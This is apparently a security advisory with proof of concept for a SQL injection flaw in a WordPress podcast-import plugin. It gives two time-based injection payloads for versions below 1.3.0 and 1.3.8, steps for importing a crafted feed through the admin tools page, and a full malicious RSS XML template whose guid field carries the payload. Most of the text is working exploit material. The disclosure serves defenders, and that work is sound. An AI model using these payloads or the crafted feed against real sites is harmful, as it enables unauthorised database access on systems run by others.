The plugin does not sanitise and properly escape some imported data, which could allow SQL injection attacks to be performed by imported a malicious podcast file
Put the XML below on a web server (replacing the PAYLOAD with the correct one), then import a podcast (/wp-admin/tools.php?page=secondlinepodcastimport) and put the URL to the XML in the Podcast Feed URL field and click import
Payloads:
v < 1.3.0 - https://satchmo.secondlinethemes.com/?p=82%') union select (sleep(10));#
v < 1.3.8 - <![CDATA[https://satchmo.secondlinethemes.com/?p=82%") union select (sleep(5))#]]>
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl"
href="https://dixie.secondlinethemes.com/wp-content/plugins/seriously-
simple-podcasting/templates/feed-stylesheet.xsl"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0">
<channel>
<title>Dixie WordPress Theme</title>
<atom:link href="https://dixie.secondlinethemes.com/feed/podcast" rel="self" type="application/rss+xml" />
<link>https://dixie.secondlinethemes.com/</link>
<description>A Powerful Podcasting Theme</description>
<lastBuildDate>Mon, 09 Nov 2020 10:08:04 +0000</lastBuildDate>
<language>en-US</language>
<copyright>Ā© 2021 Dixie WordPress Theme</copyright>
<itunes:subtitle>A Powerful Podcasting Theme</itunes:subtitle>
<itunes:author>Dixie WordPress Theme</itunes:author>
<itunes:summary>A Powerful Podcasting Theme</itunes:summary>
<itunes:owner>
<itunes:name>Dixie WordPress Theme</itunes:name>
<itunes:email>[email protected]</itunes:email>
</itunes:owner>
<itunes:explicit>clean</itunes:explicit>
<googleplay:author>Dixie WordPress Theme</googleplay:author>
<googleplay:email>[email protected]</googleplay:email>
<googleplay:description>A Powerful Podcasting Theme</googleplay:description>
<googleplay:explicit>No</googleplay:explicit>
<item>
<title>Episode 10: New Recording Studios</title>
<link>https://dixie.secondlinethemes.com/podcast/episode-10-new-recording-studios/</link>
<pubDate>Wed, 24 Jul 2019 11:16:50 +0000</pubDate>
<dc:creator>Dixie</dc:creator>
<guid isPermaLink="false">PAYLOAD</guid>
<description>
<![CDATA[aa]]>
</description>
<itunes:subtitle>
<![CDATA[aa]]>
</itunes:subtitle>
<content:encoded>
<![CDATA[aa]]>
</content:encoded>
<enclosure url="https://dixie.secondlinethemes.com/podcast-download/82episode-10-new-recording-studios.mp3" length="5425142" type="audio/mpeg"></enclosure>
<itunes:summary>
<![CDATA[aa]]>
</itunes:summary>
<itunes:explicit>clean</itunes:explicit>
<itunes:block>no</itunes:block>
<itunes:duration>02:16</itunes:duration>
<itunes:author>Dixie</itunes:author>
<googleplay:description>
<![CDATA[aa]]>
</googleplay:description>
<googleplay:explicit>No</googleplay:explicit>
<googleplay:block>no</googleplay:block>
</item>
</channel>
</rss>